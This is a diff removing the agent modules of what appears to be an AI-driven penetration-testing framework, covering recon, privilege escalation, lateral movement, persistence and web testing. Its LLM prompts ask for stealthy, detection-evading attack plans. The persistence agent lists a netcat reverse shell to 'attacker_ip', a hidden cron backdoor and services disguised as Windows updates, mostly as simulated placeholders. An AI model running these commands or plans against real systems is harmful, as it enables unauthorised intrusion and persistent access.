"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
logger = logging.getLogger(__name__)
class LateralMovementAgent:
"""Agent responsible for lateral movement"""
def __init__(self, config: Dict):
"""Initialize lateral movement agent"""
self.config = config
self.llm = LLMManager(config)
logger.info("LateralMovementAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute lateral movement phase"""
logger.info(f"Starting lateral movement from {target}")
results = {
"target": target,
"status": "running",
"discovered_hosts": [],
"compromised_hosts": [],
"credentials_used": [],
"movement_paths": [],
"ai_analysis": {}
}
try:
# Get previous phase data
recon_data = context.get("phases", {}).get("recon", {})
privesc_data = context.get("phases", {}).get("privilege_escalation", {})
# Phase 1: Network Discovery
logger.info("Phase 1: Internal network discovery")
results["discovered_hosts"] = self._discover_internal_network(recon_data)
# Phase 2: AI-Powered Movement Strategy
logger.info("Phase 2: AI lateral movement strategy")
strategy = self._ai_movement_strategy(context, results["discovered_hosts"])
results["ai_analysis"] = strategy
# Phase 3: Credential Reuse
logger.info("Phase 3: Credential reuse attacks")
credentials = privesc_data.get("credentials_harvested", [])
results["credentials_used"] = self._attempt_credential_reuse(
results["discovered_hosts"],
credentials
)
# Phase 4: Pass-the-Hash/Pass-the-Ticket
logger.info("Phase 4: Pass-the-Hash/Ticket attacks")
results["movement_paths"].extend(
self._pass_the_hash_attacks(results["discovered_hosts"])
)
# Phase 5: Exploit Trust Relationships
logger.info("Phase 5: Exploiting trust relationships")
results["movement_paths"].extend(
self._exploit_trust_relationships(results["discovered_hosts"])
)
results["status"] = "completed"
logger.info("Lateral movement phase completed")
except Exception as e:
logger.error(f"Error during lateral movement: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _discover_internal_network(self, recon_data: Dict) -> List[Dict]:
"""Discover internal network hosts"""
hosts = []
# Extract hosts from recon data
network_scan = recon_data.get("network_scan", {})
for ip, data in network_scan.get("hosts", {}).items():
hosts.append({
"ip": ip,
"ports": data.get("open_ports", []),
"os": data.get("os", "unknown")
})
# Simulate additional internal discovery
hosts.extend([
{"ip": "192.168.1.10", "role": "domain_controller", "status": "discovered"},
{"ip": "192.168.1.20", "role": "file_server", "status": "discovered"},
{"ip": "192.168.1.30", "role": "workstation", "status": "discovered"}
])
return hosts
def _ai_movement_strategy(self, context: Dict, hosts: List[Dict]) -> Dict:
"""Use AI to plan lateral movement"""
prompt = self.llm.get_prompt(
"lateral_movement",
"ai_movement_strategy_user",
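            # Plain template rather than an f-string: the placeholders are filled by
            # prompt.format() below, which would fail on pre-rendered JSON braces.
            default="""
Plan a lateral movement strategy based on the following:
Current Context:
{context_json}
Discovered Hosts:
{hosts_json}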
Provide:
1. Target prioritization (high-value targets first)
2. Movement techniques for each target
3. Credential strategies
4. Evasion techniques
5. Attack path optimization
6. Fallback options
Response in JSON format with detailed attack paths.
"""
)
system_prompt = self.llm.get_prompt(
"lateral_movement",
"ai_movement_strategy_system",
default="""You are an expert in lateral movement and Active Directory attacks.
Plan sophisticated movement strategies that minimize detection and maximize impact.
Consider Pass-the-Hash, Pass-the-Ticket, RDP, WMI, PSExec, and other techniques.
Prioritize domain controllers and critical infrastructure."""
)
try:
formatted_prompt = prompt.format(
context_json=json.dumps(context, indent=2),
hosts_json=json.dumps(hosts, indent=2)
)
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI movement strategy error: {e}")
return {"error": str(e)}
def _attempt_credential_reuse(self, hosts: List[Dict], credentials: List[Dict]) -> List[Dict]:
"""Attempt credential reuse across hosts"""
attempts = []
for host in hosts[:5]: # Limit attempts
for cred in credentials[:3]:
attempts.append({
"host": host.get("ip"),
"credential": "***hidden***",
"protocol": "SMB",
"success": False, # Simulated
"status": "simulated"
})
return attempts
def _pass_the_hash_attacks(self, hosts: List[Dict]) -> List[Dict]:
"""Perform Pass-the-Hash attacks"""
attacks = []
for host in hosts:
if host.get("role") in ["domain_controller", "file_server"]:
attacks.append({
"type": "pass_the_hash",
"target": host.get("ip"),
"technique": "SMB relay",
"success": False, # Simulated
"status": "simulated"
})
return attacks
def _exploit_trust_relationships(self, hosts: List[Dict]) -> List[Dict]:
"""Exploit trust relationships"""
exploits = []
# Domain trust exploitation
exploits.append({
"type": "domain_trust",
"description": "Cross-domain exploitation",
"status": "simulated"
})
# Kerberos delegation
exploits.append({
"type": "kerberos_delegation",
"description": "Unconstrained delegation abuse",
"status": "simulated"
})
return exploits
-148
View File
@@ -1,148 +0,0 @@
#!/usr/bin/env python3
"""
Network Reconnaissance Agent - Network-focused information gathering and enumeration
"""
import json
import logging
from typing import Dict, List
from urllib.parse import urlparse
from core.llm_manager import LLMManager
from tools.recon import (
    NetworkScanner,
    OSINTCollector,
    DNSEnumerator,
    SubdomainFinder
)
logger = logging.getLogger(__name__)
class NetworkReconAgent:
"""Agent responsible for network-focused reconnaissance and information gathering"""
def __init__(self, config: Dict):
"""Initialize network reconnaissance agent"""
self.config = config
self.llm = LLMManager(config)
self.network_scanner = NetworkScanner(config)
self.osint = OSINTCollector(config)
self.dns_enum = DNSEnumerator(config)
self.subdomain_finder = SubdomainFinder(config)
logger.info("NetworkReconAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute network reconnaissance phase"""
logger.info(f"Starting network reconnaissance on {target}")
results = {
"target": target,
"status": "running",
"findings": [],
"network_scan": {},
"osint": {},
"dns": {},
"subdomains": [],
"ai_analysis": {}
}
# Parse target to extract hostname if it's a URL
parsed_target = urlparse(target)
target_host = parsed_target.hostname or target # Use hostname if exists, otherwise original target
logger.info(f"Target for network tools: {target_host}")
try:
# Phase 1: Network Scanning
logger.info("Phase 1: Network scanning")
results["network_scan"] = self.network_scanner.scan(target_host) # Use target_host
# Phase 2: DNS Enumeration
logger.info("Phase 2: DNS enumeration")
results["dns"] = self.dns_enum.enumerate(target_host) # Use target_host
# Phase 3: Subdomain Discovery
logger.info("Phase 3: Subdomain discovery")
results["subdomains"] = self.subdomain_finder.find(target_host) # Use target_host
# Phase 4: OSINT Collection
logger.info("Phase 4: OSINT collection")
results["osint"] = self.osint.collect(target_host) # Use target_host
# Phase 5: AI Analysis
logger.info("Phase 5: AI-powered analysis")
results["ai_analysis"] = self._ai_analysis(results)
results["status"] = "completed"
logger.info("Network reconnaissance phase completed")
except Exception as e:
logger.error(f"Error during network reconnaissance: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _ai_analysis(self, recon_data: Dict) -> Dict:
"""Use AI to analyze reconnaissance data"""
prompt = self.llm.get_prompt(
"network_recon",
"ai_analysis_user",
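            # Plain template rather than an f-string: the placeholder is filled by
            # prompt.format() below, which would fail on pre-rendered JSON braces.
            default="""
Analyze the following network reconnaissance data and provide insights:
{recon_data_json}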
Provide:
1. Attack surface summary
2. Prioritized network target list
3. Identified network vulnerabilities or misconfigurations
4. Recommended next steps for network exploitation
5. Network risk assessment
6. Stealth considerations for network activities
Response in JSON format with actionable recommendations.
"""
)
system_prompt = self.llm.get_prompt(
"network_recon",
"ai_analysis_system",
default="""You are an expert network penetration tester analyzing reconnaissance data.
Identify network security weaknesses, network attack vectors, and provide strategic recommendations.
Consider both technical and operational security aspects."""
)
        response = None  # Keeps the raw LLM output available to the error path
        try:
            # Format the user prompt with recon_data
            formatted_prompt = prompt.format(recon_data_json=json.dumps(recon_data, indent=2))
            response = self.llm.generate(formatted_prompt, system_prompt)
            return json.loads(response)
        except Exception as e:
            logger.error(f"AI analysis error: {e}")
            return {"error": str(e), "raw_response": response}
def passive_recon(self, target: str) -> Dict:
"""Perform passive reconnaissance only"""
# Parse target to extract hostname if it's a URL
parsed_target = urlparse(target)
target_host = parsed_target.hostname or target
return {
"osint": self.osint.collect(target_host), # Use target_host
"dns": self.dns_enum.enumerate(target_host), # Use target_host
"subdomains": self.subdomain_finder.find(target_host) # Use target_host
}
def active_recon(self, target: str) -> Dict:
"""Perform active reconnaissance"""
# Parse target to extract hostname if it's a URL
parsed_target = urlparse(target)
target_host = parsed_target.hostname or target
return {
"network_scan": self.network_scanner.scan(target_host) # Use target_host
}
-250
View File
@@ -1,250 +0,0 @@
#!/usr/bin/env python3
"""
Persistence Agent - Maintain access to compromised systems
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
logger = logging.getLogger(__name__)
class PersistenceAgent:
"""Agent responsible for maintaining access"""
def __init__(self, config: Dict):
"""Initialize persistence agent"""
self.config = config
self.llm = LLMManager(config)
logger.info("PersistenceAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute persistence phase"""
logger.info(f"Starting persistence establishment on {target}")
results = {
"target": target,
"status": "running",
"persistence_mechanisms": [],
"backdoors_installed": [],
"scheduled_tasks": [],
"ai_recommendations": {}
}
try:
# Get previous phase data
privesc_data = context.get("phases", {}).get("privilege_escalation", {})
if not privesc_data.get("successful_escalations"):
logger.warning("No privilege escalation achieved. Limited persistence options.")
results["status"] = "limited"
# Phase 1: AI-Powered Persistence Strategy
logger.info("Phase 1: AI persistence strategy")
strategy = self._ai_persistence_strategy(context)
results["ai_recommendations"] = strategy
# Phase 2: Establish Persistence Mechanisms
logger.info("Phase 2: Establishing persistence mechanisms")
system_info = privesc_data.get("system_info", {})
os_type = system_info.get("os", "unknown")
if os_type == "linux":
results["persistence_mechanisms"].extend(
self._establish_linux_persistence()
)
elif os_type == "windows":
results["persistence_mechanisms"].extend(
self._establish_windows_persistence()
)
# Phase 3: Install Backdoors
logger.info("Phase 3: Installing backdoors")
results["backdoors_installed"] = self._install_backdoors(os_type)
# Phase 4: Create Scheduled Tasks
logger.info("Phase 4: Creating scheduled tasks")
results["scheduled_tasks"] = self._create_scheduled_tasks(os_type)
results["status"] = "completed"
logger.info("Persistence phase completed")
except Exception as e:
logger.error(f"Error during persistence: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _ai_persistence_strategy(self, context: Dict) -> Dict:
"""Use AI to plan persistence strategy"""
prompt = self.llm.get_prompt(
"persistence",
"ai_persistence_strategy_user",
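            # Plain template rather than an f-string: the placeholder is filled by
            # prompt.format() below, which would fail on pre-rendered JSON braces.
            default="""
Plan a comprehensive persistence strategy based on the following context:
{context_json}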
Provide:
1. Recommended persistence techniques (prioritized)
2. Stealth considerations
3. Resilience against system reboots
4. Evasion of detection mechanisms
5. Multiple fallback mechanisms
6. Cleanup and removal procedures
Response in JSON format with detailed implementation plan.
"""
)
system_prompt = self.llm.get_prompt(
"persistence",
"ai_persistence_strategy_system",
default="""You are an expert in persistence techniques and advanced persistent threats.
Design robust, stealthy persistence mechanisms that survive reboots and detection attempts.
Consider both Windows and Linux environments.
Prioritize operational security and longevity."""
)
try:
formatted_prompt = prompt.format(context_json=json.dumps(context, indent=2))
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI persistence strategy error: {e}")
return {"error": str(e)}
def _establish_linux_persistence(self) -> List[Dict]:
"""Establish Linux persistence mechanisms"""
mechanisms = []
# Cron job
mechanisms.append({
"type": "cron_job",
"description": "Scheduled task for persistence",
"command": "*/5 * * * * /tmp/.hidden/backdoor.sh",
"status": "simulated"
})
# SSH key
mechanisms.append({
"type": "ssh_key",
"description": "Authorized keys persistence",
"location": "~/.ssh/authorized_keys",
"status": "simulated"
})
# Systemd service
mechanisms.append({
"type": "systemd_service",
"description": "Persistent system service",
"service_name": "system-update.service",
"status": "simulated"
})
# bashrc modification
mechanisms.append({
"type": "bashrc",
"description": "Shell initialization persistence",
"location": "~/.bashrc",
"status": "simulated"
})
return mechanisms
def _establish_windows_persistence(self) -> List[Dict]:
"""Establish Windows persistence mechanisms"""
mechanisms = []
# Registry Run key
mechanisms.append({
"type": "registry_run",
"description": "Registry autorun persistence",
"key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"status": "simulated"
})
# Scheduled task
mechanisms.append({
"type": "scheduled_task",
"description": "Windows scheduled task",
"task_name": "WindowsUpdate",
"status": "simulated"
})
# WMI event subscription
mechanisms.append({
"type": "wmi_event",
"description": "WMI persistence",
"status": "simulated"
})
# Service installation
mechanisms.append({
"type": "service",
"description": "Windows service persistence",
"service_name": "WindowsSecurityUpdate",
"status": "simulated"
})
return mechanisms
def _install_backdoors(self, os_type: str) -> List[Dict]:
"""Install backdoors"""
backdoors = []
if os_type == "linux":
backdoors.extend([
{
"type": "reverse_shell",
"description": "Netcat reverse shell",
"command": "nc -e /bin/bash attacker_ip 4444",
"status": "simulated"
},
{
"type": "ssh_backdoor",
"description": "SSH backdoor on alternate port",
"port": 2222,
"status": "simulated"
}
])
elif os_type == "windows":
backdoors.extend([
{
"type": "powershell_backdoor",
"description": "PowerShell reverse shell",
"status": "simulated"
},
{
"type": "meterpreter",
"description": "Meterpreter payload",
"status": "simulated"
}
])
return backdoors
def _create_scheduled_tasks(self, os_type: str) -> List[Dict]:
"""Create scheduled tasks"""
tasks = []
if os_type == "linux":
tasks.append({
"type": "cron",
"schedule": "*/10 * * * *",
"command": "Callback beacon every 10 minutes",
"status": "simulated"
})
elif os_type == "windows":
tasks.append({
"type": "scheduled_task",
"schedule": "Daily at 2 AM",
"command": "Callback beacon",
"status": "simulated"
})
return tasks
-305
View File
@@ -1,305 +0,0 @@
#!/usr/bin/env python3
"""
Privilege Escalation Agent - System privilege elevation
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.privesc import (
LinuxPrivEsc,
WindowsPrivEsc,
KernelExploiter,
MisconfigFinder,
CredentialHarvester,
SudoExploiter
)
logger = logging.getLogger(__name__)
class PrivEscAgent:
"""Agent responsible for privilege escalation"""
def __init__(self, config: Dict):
"""Initialize privilege escalation agent"""
self.config = config
self.llm = LLMManager(config)
self.linux_privesc = LinuxPrivEsc(config)
self.windows_privesc = WindowsPrivEsc(config)
self.kernel_exploiter = KernelExploiter(config)
self.misconfig_finder = MisconfigFinder(config)
self.cred_harvester = CredentialHarvester(config)
self.sudo_exploiter = SudoExploiter(config)
logger.info("PrivEscAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute privilege escalation phase"""
logger.info(f"Starting privilege escalation on {target}")
results = {
"target": target,
"status": "running",
"escalation_paths": [],
"successful_escalations": [],
"credentials_harvested": [],
"system_info": {},
"ai_analysis": {}
}
try:
# Get exploitation data from context
exploit_data = context.get("phases", {}).get("exploitation", {})
if not exploit_data.get("successful_exploits"):
logger.warning("No successful exploits found. Limited privilege escalation options.")
results["status"] = "skipped"
results["message"] = "No initial access obtained"
return results
# Phase 1: System Enumeration
logger.info("Phase 1: System enumeration")
results["system_info"] = self._enumerate_system(exploit_data)
# Phase 2: Identify Escalation Paths
logger.info("Phase 2: Identifying escalation paths")
results["escalation_paths"] = self._identify_escalation_paths(
results["system_info"]
)
# Phase 3: AI-Powered Path Selection
logger.info("Phase 3: AI escalation strategy")
strategy = self._ai_escalation_strategy(
results["system_info"],
results["escalation_paths"]
)
results["ai_analysis"] = strategy
# Phase 4: Execute Escalation Attempts
logger.info("Phase 4: Executing escalation attempts")
for path in results["escalation_paths"][:5]:
escalation_result = self._attempt_escalation(path, results["system_info"])
if escalation_result.get("success"):
results["successful_escalations"].append(escalation_result)
logger.info(f"Successful escalation: {path.get('technique')}")
break # Stop after first successful escalation
# Phase 5: Credential Harvesting
if results["successful_escalations"]:
logger.info("Phase 5: Harvesting credentials")
results["credentials_harvested"] = self._harvest_credentials(
results["system_info"]
)
results["status"] = "completed"
logger.info("Privilege escalation phase completed")
except Exception as e:
logger.error(f"Error during privilege escalation: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _enumerate_system(self, exploit_data: Dict) -> Dict:
"""Enumerate system for privilege escalation opportunities"""
system_info = {
"os": "unknown",
"kernel_version": "unknown",
"architecture": "unknown",
"users": [],
"groups": [],
"sudo_permissions": [],
"suid_binaries": [],
"writable_paths": [],
"scheduled_tasks": [],
"services": [],
"environment_variables": {}
}
# Determine OS type from exploit data
os_type = self._detect_os_type(exploit_data)
system_info["os"] = os_type
if os_type == "linux":
system_info.update(self.linux_privesc.enumerate())
elif os_type == "windows":
system_info.update(self.windows_privesc.enumerate())
return system_info
def _detect_os_type(self, exploit_data: Dict) -> str:
"""Detect operating system type"""
# Placeholder - would analyze exploit data to determine OS
return "linux" # Default assumption
def _identify_escalation_paths(self, system_info: Dict) -> List[Dict]:
"""Identify possible privilege escalation paths"""
paths = []
os_type = system_info.get("os")
if os_type == "linux":
# SUID exploitation
for binary in system_info.get("suid_binaries", []):
paths.append({
"technique": "suid_exploitation",
"target": binary,
"difficulty": "medium",
"likelihood": 0.6
})
# Sudo exploitation
for permission in system_info.get("sudo_permissions", []):
paths.append({
"technique": "sudo_exploitation",
"target": permission,
"difficulty": "low",
"likelihood": 0.8
})
# Kernel exploitation
if system_info.get("kernel_version"):
paths.append({
"technique": "kernel_exploit",
"target": system_info["kernel_version"],
"difficulty": "high",
"likelihood": 0.4
})
# Writable path exploitation
for path in system_info.get("writable_paths", []):
if "bin" in path or "sbin" in path:
paths.append({
"technique": "path_hijacking",
"target": path,
"difficulty": "medium",
"likelihood": 0.5
})
elif os_type == "windows":
# Service exploitation
for service in system_info.get("services", []):
if service.get("unquoted_path") or service.get("weak_permissions"):
paths.append({
"technique": "service_exploitation",
"target": service,
"difficulty": "medium",
"likelihood": 0.7
})
# AlwaysInstallElevated
if system_info.get("always_install_elevated"):
paths.append({
"technique": "always_install_elevated",
"target": "MSI",
"difficulty": "low",
"likelihood": 0.9
})
# Token impersonation
paths.append({
"technique": "token_impersonation",
"target": "SeImpersonatePrivilege",
"difficulty": "medium",
"likelihood": 0.6
})
# Sort by likelihood
paths.sort(key=lambda x: x.get("likelihood", 0), reverse=True)
return paths
def _ai_escalation_strategy(self, system_info: Dict, escalation_paths: List[Dict]) -> Dict:
"""Use AI to optimize escalation strategy"""
prompt = self.llm.get_prompt(
"privesc",
"ai_escalation_strategy_user",
default=f"""
Analyze the system and recommend optimal privilege escalation strategy:
System Information:
{json.dumps(system_info, indent=2)}
Identified Escalation Paths:
{json.dumps(escalation_paths, indent=2)}
Provide:
1. Recommended escalation path (with justification)
2. Step-by-step execution plan
3. Required tools and commands
4. Detection likelihood and evasion techniques
5. Fallback options
6. Post-escalation actions
Response in JSON format with actionable recommendations.
"""
)
system_prompt = self.llm.get_prompt(
"privesc",
"ai_escalation_strategy_system",
default="""You are an expert in privilege escalation techniques.
Analyze systems and recommend the most effective, stealthy escalation paths.
Consider Windows, Linux, and Active Directory environments.
Prioritize reliability and minimal detection."""
)
try:
formatted_prompt = prompt.format(
system_info_json=json.dumps(system_info, indent=2),
escalation_paths_json=json.dumps(escalation_paths, indent=2)
)
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI escalation strategy error: {e}")
return {"error": str(e)}
def _attempt_escalation(self, path: Dict, system_info: Dict) -> Dict:
"""Attempt privilege escalation using specified path"""
technique = path.get("technique")
os_type = system_info.get("os")
result = {
"technique": technique,
"success": False,
"details": {}
}
try:
if os_type == "linux":
if technique == "suid_exploitation":
result = self.linux_privesc.exploit_suid(path.get("target"))
elif technique == "sudo_exploitation":
result = self.sudo_exploiter.exploit(path.get("target"))
elif technique == "kernel_exploit":
result = self.kernel_exploiter.exploit_linux(path.get("target"))
elif technique == "path_hijacking":
result = self.linux_privesc.exploit_path_hijacking(path.get("target"))
elif os_type == "windows":
if technique == "service_exploitation":
result = self.windows_privesc.exploit_service(path.get("target"))
elif technique == "always_install_elevated":
result = self.windows_privesc.exploit_msi()
elif technique == "token_impersonation":
result = self.windows_privesc.impersonate_token()
except Exception as e:
logger.error(f"Escalation error for {technique}: {e}")
result["error"] = str(e)
return result
def _harvest_credentials(self, system_info: Dict) -> List[Dict]:
"""Harvest credentials after privilege escalation"""
os_type = system_info.get("os")
if os_type == "linux":
return self.cred_harvester.harvest_linux()
elif os_type == "windows":
return self.cred_harvester.harvest_windows()
return []
-120
View File
@@ -1,120 +0,0 @@
#!/usr/bin/env python3
"""
Web Pentest Agent - Specialized agent for web application penetration testing.
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.web_pentest import WebRecon # Import the moved WebRecon tool
logger = logging.getLogger(__name__)
class WebPentestAgent:
"""Agent responsible for comprehensive web application penetration testing."""
def __init__(self, config: Dict):
"""Initializes the WebPentestAgent."""
self.config = config
self.llm = LLMManager(config)
self.web_recon = WebRecon(config)
# Placeholder for web exploitation tools if they become separate classes
# self.web_exploiter = WebExploiter(config)
logger.info("WebPentestAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Executes the web application penetration testing phase."""
logger.info(f"Starting web pentest on {target}")
results = {
"target": target,
"status": "running",
"web_recon_results": {},
"vulnerability_analysis": [],
"exploitation_attempts": [],
"ai_analysis": {}
}
try:
# Phase 1: Web Reconnaissance
logger.info("Phase 1: Web Reconnaissance (WebPentestAgent)")
web_recon_output = self.web_recon.analyze(target)
results["web_recon_results"] = web_recon_output
# Phase 2: Vulnerability Analysis (AI-powered)
logger.info("Phase 2: AI-powered Vulnerability Analysis")
# This part will be improved later with more detailed vulnerability detection in WebRecon
# For now, it will look for findings reported by WebRecon
potential_vulnerabilities = self._identify_potential_web_vulnerabilities(web_recon_output)
if potential_vulnerabilities:
results["vulnerability_analysis"] = potential_vulnerabilities
ai_vulnerability_analysis = self._ai_analyze_web_vulnerabilities(potential_vulnerabilities, target)
results["ai_analysis"]["vulnerability_insights"] = ai_vulnerability_analysis
else:
logger.info("No immediate web vulnerabilities identified by WebRecon.")
# Phase 3: Web Exploitation (Placeholder for now)
# This will integrate with exploitation tools later.
results["status"] = "completed"
logger.info("Web pentest phase completed")
except Exception as e:
logger.error(f"Error during web pentest: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _identify_potential_web_vulnerabilities(self, web_recon_output: Dict) -> List[Dict]:
"""
Identifies potential web vulnerabilities based on WebRecon output.
This is a placeholder and will be enhanced as WebRecon improves.
"""
vulnerabilities = []
if "vulnerabilities" in web_recon_output:
vulnerabilities.extend(web_recon_output["vulnerabilities"])
return vulnerabilities
def _ai_analyze_web_vulnerabilities(self, vulnerabilities: List[Dict], target: str) -> Dict:
"""Uses AI to analyze identified web vulnerabilities."""
prompt = self.llm.get_prompt(
"web_recon",
"ai_analysis_user",
default="""
Analyze the following potential web vulnerabilities identified on {target} and provide insights:
Vulnerabilities: {vulnerabilities_json}
Provide:
1. Prioritized list of vulnerabilities
2. Recommended exploitation steps for each (if applicable)
3. Potential impact
4. Remediation suggestions
Respond in JSON format with actionable recommendations.
"""
)
system_prompt = self.llm.get_prompt(
"web_recon",
"ai_analysis_system",
default="""You are an expert web penetration tester and security analyst.
Provide precise analysis of web vulnerabilities and practical advice for exploitation and remediation."""
)
response = None
try:
# Fill the template placeholders with the target and the serialized findings
formatted_prompt = prompt.format(
target=target,
vulnerabilities_json=json.dumps(vulnerabilities, indent=2)
)
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI web vulnerability analysis error: {e}")
# response stays None when the failure happened before the LLM call returned
return {"error": str(e), "raw_response": response}
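The prompt handling above relies on `str.format`, which treats every `{` in the template as the start of a replacement field. A minimal sketch of why the template should carry named placeholders and receive the serialized JSON as a value; `TEMPLATE`, `render_prompt` and `prerendered_template_breaks` are hypothetical names, not part of `LLMManager`:

```python
import json

# Hypothetical template; in the agent the text would come from LLMManager.get_prompt.
TEMPLATE = (
    "Analyze the following potential web vulnerabilities identified on {target}:\n"
    "Vulnerabilities: {vulnerabilities_json}\n"
)


def render_prompt(template: str, target: str, vulnerabilities: list) -> str:
    """Fill the named placeholders; substituted values are not re-parsed for braces."""
    return template.format(
        target=target,
        vulnerabilities_json=json.dumps(vulnerabilities, indent=2),
    )


def prerendered_template_breaks() -> bool:
    """Show that calling .format() on text that already contains JSON braces fails."""
    rendered = f"Vulnerabilities: {json.dumps([{'type': 'xss'}])}"
    try:
        rendered.format(target="http://example.test")
    except (KeyError, ValueError, IndexError):
        return True
    return False
```

Because the JSON is passed in as a value, its braces never reach the format parser, so the same template works for any finding list.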
-1
View File
@@ -1 +0,0 @@
# API package
@@ -1 +0,0 @@
# API v1 package
File diff suppressed because it is too large
@@ -1,176 +0,0 @@
"""
NeuroSploit v3 - Agent Tasks API Endpoints
"""
from typing import Optional
from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select, func
from backend.db.database import get_db
from backend.models import AgentTask, Scan
from backend.schemas.agent_task import (
AgentTaskResponse,
AgentTaskListResponse,
AgentTaskSummary
)
router = APIRouter()
@router.get("", response_model=AgentTaskListResponse)
async def list_agent_tasks(
scan_id: str,
status: Optional[str] = None,
task_type: Optional[str] = None,
page: int = 1,
per_page: int = 50,
db: AsyncSession = Depends(get_db)
):
"""List all agent tasks for a scan"""
# Verify scan exists
scan_result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
# Build query
query = select(AgentTask).where(AgentTask.scan_id == scan_id)
if status:
query = query.where(AgentTask.status == status)
if task_type:
query = query.where(AgentTask.task_type == task_type)
query = query.order_by(AgentTask.created_at.desc())
# Get total count
count_query = select(func.count()).select_from(AgentTask).where(AgentTask.scan_id == scan_id)
if status:
count_query = count_query.where(AgentTask.status == status)
if task_type:
count_query = count_query.where(AgentTask.task_type == task_type)
total_result = await db.execute(count_query)
total = total_result.scalar() or 0
# Apply pagination
query = query.offset((page - 1) * per_page).limit(per_page)
result = await db.execute(query)
tasks = result.scalars().all()
return AgentTaskListResponse(
tasks=[AgentTaskResponse(**t.to_dict()) for t in tasks],
total=total,
scan_id=scan_id
)
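The pagination in `list_agent_tasks` maps `page` and `per_page` to an offset and a limit, and the handler passes both values through unchecked. A sketch of a clamped version, assuming a cap is wanted; `page_window` and the `max_per_page` default of 200 are illustrative choices, not values from the project:

```python
from typing import Tuple


def page_window(page: int, per_page: int, max_per_page: int = 200) -> Tuple[int, int]:
    """Return (offset, limit) for 1-based pages, clamping out-of-range input."""
    page = max(page, 1)                              # page 0 or negative falls back to page 1
    per_page = min(max(per_page, 1), max_per_page)   # keep the limit within [1, max_per_page]
    return (page - 1) * per_page, per_page
```

With FastAPI the same bounds could also be declared on the parameters themselves; the helper only makes the arithmetic explicit.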
@router.get("/summary", response_model=AgentTaskSummary)
async def get_agent_tasks_summary(
scan_id: str,
db: AsyncSession = Depends(get_db)
):
"""Get summary statistics for agent tasks in a scan"""
# Verify scan exists
scan_result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
# Total count
total_result = await db.execute(
select(func.count()).select_from(AgentTask).where(AgentTask.scan_id == scan_id)
)
total = total_result.scalar() or 0
# Count by status
status_counts = {}
for status in ["pending", "running", "completed", "failed"]:
count_result = await db.execute(
select(func.count()).select_from(AgentTask)
.where(AgentTask.scan_id == scan_id)
.where(AgentTask.status == status)
)
status_counts[status] = count_result.scalar() or 0
# Count by task type
type_query = select(
AgentTask.task_type,
func.count(AgentTask.id).label("count")
).where(AgentTask.scan_id == scan_id).group_by(AgentTask.task_type)
type_result = await db.execute(type_query)
by_type = {row[0]: row[1] for row in type_result.all()}
# Count by tool
tool_query = select(
AgentTask.tool_name,
func.count(AgentTask.id).label("count")
).where(AgentTask.scan_id == scan_id).where(AgentTask.tool_name.isnot(None)).group_by(AgentTask.tool_name)
tool_result = await db.execute(tool_query)
by_tool = {row[0]: row[1] for row in tool_result.all()}
return AgentTaskSummary(
total=total,
pending=status_counts.get("pending", 0),
running=status_counts.get("running", 0),
completed=status_counts.get("completed", 0),
failed=status_counts.get("failed", 0),
by_type=by_type,
by_tool=by_tool
)
@router.get("/{task_id}", response_model=AgentTaskResponse)
async def get_agent_task(
task_id: str,
db: AsyncSession = Depends(get_db)
):
"""Get a specific agent task by ID"""
result = await db.execute(select(AgentTask).where(AgentTask.id == task_id))
task = result.scalar_one_or_none()
if not task:
raise HTTPException(status_code=404, detail="Agent task not found")
return AgentTaskResponse(**task.to_dict())
@router.get("/scan/{scan_id}/timeline")
async def get_agent_tasks_timeline(
scan_id: str,
db: AsyncSession = Depends(get_db)
):
"""Get agent tasks as a timeline for visualization"""
# Verify scan exists
scan_result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
# Get all tasks ordered by creation time
query = select(AgentTask).where(AgentTask.scan_id == scan_id).order_by(AgentTask.created_at.asc())
result = await db.execute(query)
tasks = result.scalars().all()
timeline = []
for task in tasks:
timeline_item = {
"id": task.id,
"task_name": task.task_name,
"task_type": task.task_type,
"tool_name": task.tool_name,
"status": task.status,
"started_at": task.started_at.isoformat() if task.started_at else None,
"completed_at": task.completed_at.isoformat() if task.completed_at else None,
"duration_ms": task.duration_ms,
"items_processed": task.items_processed,
"items_found": task.items_found,
"result_summary": task.result_summary,
"error_message": task.error_message
}
timeline.append(timeline_item)
return {
"scan_id": scan_id,
"timeline": timeline,
"total": len(timeline)
}
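The summary endpoint above issues one COUNT query per status. The same numbers can probably be produced with a single GROUP BY. The sketch below uses the standard-library `sqlite3` module and a hypothetical `agent_tasks` table rather than the project's SQLAlchemy models, so it only illustrates the query shape:

```python
import sqlite3

STATUSES = ("pending", "running", "completed", "failed")


def count_by_status(conn: sqlite3.Connection, scan_id: str) -> dict:
    """Count tasks per status in one query, defaulting missing statuses to 0."""
    rows = conn.execute(
        "SELECT status, COUNT(*) FROM agent_tasks WHERE scan_id = ? GROUP BY status",
        (scan_id,),
    ).fetchall()
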